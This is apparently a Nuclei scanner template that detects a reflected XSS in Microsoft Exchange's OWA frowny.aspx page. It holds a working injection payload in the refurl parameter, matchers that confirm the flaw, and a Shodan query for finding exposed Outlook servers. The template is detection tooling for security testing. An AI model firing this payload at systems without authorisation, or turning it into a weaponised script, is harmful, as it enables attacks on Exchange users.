id: ms-exchange-server-reflected-xss info: name: MS Exchange Server XSS author: infosecsanyam severity: medium reference: - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html tags: microsoft,exchange,owa,xss requests: - method: GET path: - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//' matchers-condition: and matchers: - type: word words: - 'alert(document.domain)//&et=ServerError' - 'mail/bootr.ashx' condition: and - type: status status: - 500 - type: word words: - "text/html" part: header